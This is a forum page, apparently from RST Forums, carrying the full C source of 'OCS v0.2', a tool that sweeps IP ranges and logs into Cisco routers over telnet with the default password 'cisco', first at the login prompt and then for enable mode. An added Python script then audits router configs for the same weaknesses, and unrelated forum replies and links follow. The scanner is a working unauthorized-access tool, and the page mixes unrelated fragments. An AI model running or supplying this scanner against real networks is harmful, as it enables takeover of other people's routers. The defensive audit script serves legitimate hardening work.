         Khlero with your patience this code is out there
         Shen139, without you I can't live
         people that helped betatesting this code
         Alex Kah and his Cisco Router
         I love U all
*/

ocs.c

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   // inet_addr()
#include <pthread.h>     // pthread_create(), pthread_join(), pthread_exit()
#include <unistd.h>
#include <string.h>
#include <signal.h>

int i=0;
int j=0;
int k=0;
int l=0;

char buffer_a[700];
char buffer_b[700];
char buffer_c[700];

char tmpIP[16];

pthread_t threadname;

int scanna(char *rangeIP);   // defined below, called from callScan()

void *callScan(void *arg) // scanning (thread entry point, signature required by pthread_create)
{
    scanna(tmpIP);
    pthread_exit(0);
}

static void funcAlarm() //alarm
{
    pthread_exit(0);
}

int setnonblock(int sock) // "set non-blocking sockets": in practice sets a 10 s receive timeout
{
    struct timeval timeout;
    timeout.tv_sec = 10;
    timeout.tv_usec = 0;
    if (setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,(char*) &timeout, sizeof(timeout)))
        return 0;
    return 1;
}

void init(struct sockaddr_in *address,int port,int IP)
{
    address->sin_family=AF_INET;
    address->sin_port=htons((u_short)port);
    address->sin_addr.s_addr=IP;
}

int scanna(char*rangeIP) //scanning
{
    int error;
    int sd;
    struct sockaddr_in server;

    // (the original called close(sd) here, on a descriptor that was not yet initialised)
    server.sin_family=AF_INET;
    server.sin_port=htons(23);
    server.sin_addr.s_addr=inet_addr(rangeIP);

    sd=socket(AF_INET,SOCK_STREAM,0);
    if(sd==-1)
    {
        printf("Socket Error(%s)\n",rangeIP);
        close(sd);
        pthread_exit(0);
    }

    // setnonblock(sd);
    signal(SIGALRM,funcAlarm);
    alarm(7);
    fflush(stdout);

    error=connect(sd,(struct sockaddr*)&server,sizeof(server));
    if(error==0)
    {
        printf("\n\n-%s\n",rangeIP);
        fflush(stdout);
        memset(buffer_c, '\0',700);
        recv(sd,buffer_c,700,0);
        printf(" |Logging... %s\n",rangeIP);
        fflush(stdout);
        memset(buffer_a, '\0',700);
        memset(buffer_b, '\0',700);
        send(sd,"cisco\r",6,0);
        sleep(1);
        recv(sd,buffer_a,700,0);

        if(strstr(buffer_a,"#"))
            printf(" |Default Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP);
        else if(strstr(buffer_a,">"))
        {
            printf(" |Default Telnet password found. %s\n",rangeIP);
            fflush(stdout);
            send(sd,"enable\r",7,0);
            sleep(1);
            send(sd,"cisco\r",6,0);
            sleep(1);
            recv(sd,buffer_b,700,0);
            //printf(" Sto cercando di loggarmi in enable mode\n");
            //fflush(stdout);
        }

        if(strstr(buffer_b,"#"))
            printf(" |Default Telnet and Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP);
        else
            printf(" |Router not vulnerable. \n");
        fflush(stdout);
    }
    else
    {
        printf("\n\n(%s) Filtered Ports\n",rangeIP);
        close(sd);
        alarm(0);
        signal(SIGALRM,NULL);
        pthread_exit(0);
    }

    close(sd);
    fflush(stdout);
    alarm(0);
    signal(SIGALRM,NULL);
    pthread_exit(0);
}

char *getByte(char *IP,int index);

int function1(char* IP, char* IP2)
{
    char rangeIP[16];
    pid_t pid;

    i=atoi(getByte(IP,1));
    j=atoi(getByte(IP,2));
    k=atoi(getByte(IP,3));
    l=atoi(getByte(IP,4));

    while(1)
    {
        sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l);
        strcpy(tmpIP,rangeIP);

        if(pthread_create(&threadname, NULL,callScan,NULL)!=0)
        {
            printf("+ Thread error:\n");
            perror(" - pthread_create() ");
            exit(0);
        }
        fflush(stdout);
        pthread_join(threadname, NULL);
        fflush(stdout);

        l++;
        if (l==256)
        {
            l=0;
            k++;
            if (k==256)
            {
                k=0;
                j++;
                if (j==256)
                {
                    j=0;
                    i++;
                }
            }
        }

        if(i==atoi(getByte(IP2,1)) && j==atoi(getByte(IP2,2)) && k==atoi(getByte(IP2,3)) && l==atoi(getByte(IP2,4)))
        {
            break;
        }
    }

    sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l);
    strcpy(tmpIP,rangeIP);
    fflush(stdout);

    if(pthread_create(&threadname, NULL,callScan,NULL)!=0)
    {
        printf("+ Thread error:\n");
        perror(" - pthread_create() ");
        exit(0);
    }
    pthread_join(threadname, NULL);
    fflush(stdout);
    return 0;   // the original fell off the end of a non-void function
}

int main(int argc,char *argv[])
{
    int w;

    printf("********************************* OCS v 0.2 **********************************\n");
    printf("**** ****\n");
    printf("**** coded by OverIP ****\n");
    printf("**** overip at gmail.com ****\n");
    printf("**** under GPL License ****\n");
    printf("**** ****\n");
    printf("**** usage: ./ocs xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy ****\n");
    printf("**** ****\n");
    printf("**** xxx.xxx.xxx.xxx = range start IP ****\n");
    printf("**** yyy.yyy.yyy.yyy = range end IP ****\n");
    printf("**** ****\n");
    printf("******************************************************************************\n");

    if(argc!=3)
    {
        printf("use: %s IP IP\n",argv[0]);
        exit(-1);
    }

    for(w=1;w<=5;w++)
        if(atoi(getByte(argv[1],w))>255 || atoi(getByte(argv[2],w))>255)
        {
            printf("use: ./OCS IP IP\n");
            exit (-1);
        }

    for(w=1;w<=5;w++)
        if(atoi(getByte(argv[1],w))<atoi(getByte(argv[2],w)))
        {
            function1(argv[1],argv[2]);
            return 0;
        }
        else if(atoi(getByte(argv[1],w))>atoi(getByte(argv[2],w)))
        {
            printf("use: %s IP IP\n",argv[0]);
            return 0;
        }

    printf("Same IPs \n");
    fflush(stdout);
    scanna(argv[1]);
    return 0;
}

char *getByte(char *IP,int index)
{
    int i=0;
    int separator=0;
    // was byte[3]: too small for a three-digit octet plus the terminating NUL,
    // and the append below was unbounded for over-long fields in argv
    static char byte[16];

    for(i=0;i<4;i++)
        byte[i]='\0';
    memset(byte,0,sizeof(byte));

    for(i=0;i<strlen(IP);i++)
    {
        if((IP[i]=='.') && (separator==index-1))
        {
            return byte;
        }
        else if(IP[i]=='.')
        {
            separator++;
        }
        else if (separator==index-1 && strlen(byte)<sizeof(byte)-1)
        {
            strncat(byte,&IP[i],1);
        }
    }
    return byte;
}

Source
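A defender-side counterpart to the scanner above, added here as an example and not part of the original post or of OCS: it audits a saved IOS running-config for the two conditions the tool probes for, the password "cisco" and telnet on vty lines. The sample config and the function name `audit_ios_config` are constructed for illustration.

```python
import re

# Passwords treated as defaults; "cisco" is the one the scanner above sends.
DEFAULT_PASSWORDS = {"cisco"}

# Constructed sample running-config (assumption: not from any real device).
SAMPLE_CONFIG = """\
hostname lab-rtr1
enable password cisco
!
line con 0
 password s3rv1ce-Console
 login
line vty 0 4
 password cisco
 login
 transport input telnet ssh
line vty 5 15
 login local
 transport input ssh
"""

def audit_ios_config(text):
    """Return [(line_number, finding)] for default passwords and telnet on vty lines."""
    findings = []
    section = None  # current "line ..." block, e.g. "vty 0 4"
    for num, raw in enumerate(text.splitlines(), 1):
        if not raw.startswith(" "):  # a top-level command closes any open block
            m = re.match(r"line (\S+(?: \d+)*)", raw)
            section = m.group(1) if m else None
        stripped = raw.strip()
        # Cleartext forms only: "password X", "password 0 X", "enable password X".
        # Type 7 or secret hashes do not match and are left to a separate check.
        m = re.match(r"(enable )?password (?:0 )?(\S+)$", stripped)
        if m and m.group(2) in DEFAULT_PASSWORDS:
            where = "enable" if m.group(1) else "line %s" % section
            findings.append((num, "default password on " + where))
        # Telnet accepted on remote-access (vty) lines.
        m = re.match(r"transport input (.+)$", stripped)
        if m and section and section.startswith("vty"):
            if {"telnet", "all"} & set(m.group(1).split()):
                findings.append((num, "telnet enabled on line " + section))
    return findings

if __name__ == "__main__":
    for num, finding in audit_ios_config(SAMPLE_CONFIG):
        print("line %d: %s" % (num, finding))
```

A vty block with no `transport input` line is not flagged here; what it accepts depends on the platform default, so check that separately.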
-
So what does it do exactly? Please be more explicit, I don't understand... I'm asking, don't throw stones....
-
Description?! What exactly does it do, so that I don't die ignorant? Excerpt from the rules. You deserve a warn.
-
https://rstforums.com/forum/25915-more-psd-html-tutorials.rst
-
Deep Freeze, by Faronics
-
Is Li-Fi, a method of transmitting data wirelessly using LED, the answer to the world's problem of congested bandwidth? Source: YouTube
-
Freedom!!!